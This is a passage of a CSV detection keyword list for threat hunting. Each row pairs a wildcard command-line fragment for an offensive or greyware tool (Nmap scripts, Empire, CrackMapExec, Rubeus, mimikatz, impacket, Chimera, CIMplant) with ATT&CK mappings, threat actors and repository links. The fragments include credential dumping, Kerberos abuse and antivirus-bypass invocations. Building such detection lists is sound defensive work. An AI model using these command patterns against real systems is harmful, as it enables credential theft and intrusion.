+"* rfc868-time.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* -Rhost * -WARFile http*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-JBoss.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"* -Rhosts * -Password * -Directory * -Dictionary *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","HTTP-Login.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"* -Rhosts * -Path *.txt -Port *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Find-Fruit.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"* riak-http-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* --rid-brute 2>&1 *.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"* --rid-brute*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"* rid-hijack -*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z"
+"* -rl 4 -ta 8 -t 2100 -an AS8560*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z"
+"* rlogin-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* rmi-dumpregistry.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* rmi-vuln-classloader.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* rockyou.txt *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"* --rogue-smbserver-ip *","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z"
+"* --rogue-smbserver-share *","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z"
+"* ropbuffers.go*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z"
+"* 
ropfuscator*","offensive_tool_keyword","ropfuscator","ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).","T1090 - T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ropfuscator/ropfuscator","1","0","N/A","N/A","4","375","30","2023-08-11T00:41:55Z","2021-11-16T18:13:57Z"
+"* rpcap-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* rpcap-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* rpc-grind.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* rpcinfo.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* rsa-vuln-roca.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* rsync-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* rsync-list-modules.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* rtsp-methods.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* rtsp-url-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* -Rubeus -Command *kerberoast*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"* ruler.exe*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z"
+"* --rules:Jumbo *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"* run donpapi*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential 
Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z"
+"* RunasCs.cs*","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z"
+"* -runaslsass*","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/foxlox/GIUDA","1","0","N/A","9","4","388","50","2023-09-28T15:54:16Z","2023-07-19T15:37:07Z"
+"* rusers.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* rustbof *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - 
T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wumb0/rust_bof","1","0","N/A","10","10","189","22","2023-03-03T22:53:02Z","2022-02-28T23:46:00Z"
+"* rusthound.exe*","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","AD Enumeration","https://github.com/OPENCYBER-FR/RustHound","1","0","N/A","9","7","676","56","2023-08-31T08:35:38Z","2022-10-12T05:54:35Z"
+"* -s * -c command_exec --execute *","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z"
+"* -s * -c disable_wdigest *","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z"
+"* -s * -c disable_winrm *","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z"
+"* -s * -c enable_wdigest *","offensive_tool_keyword","CIMplant","C# 
port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z"
+"* -s * -c enable_winrm *","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z"
+"* -s * -c remote_posh *","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z"
+"* -s * --method 1 --function shell_exec --parameters cmd:id*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"* -s *ascii* -b *reverse*invoke-expression*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z"
+"* -s putty.exe_sig *","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some 
builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,,
+"*' s::l '*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"* s4u * /bronzebit*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z"
+"* s4u * /nopac*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z"
+"* s4u * /ticket:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z"
+"* s4u *.kirbi*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z"
+"* s4u */rc4:* ","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z"
+"* s7-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* -sam * -system * -security * LOCAL > *.out*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
+"* samba-vuln-cve-2012-1182.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* -SauronEye -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"* -save-old -dc-ip *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"* -sc GetSyscallStub *","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,,
+"* -sc SysWhispers3*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,,
+"* -sc trustdump*","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. 
group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in lateral movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","SolarWinds Compromise","FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass","Reconnaissance","https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
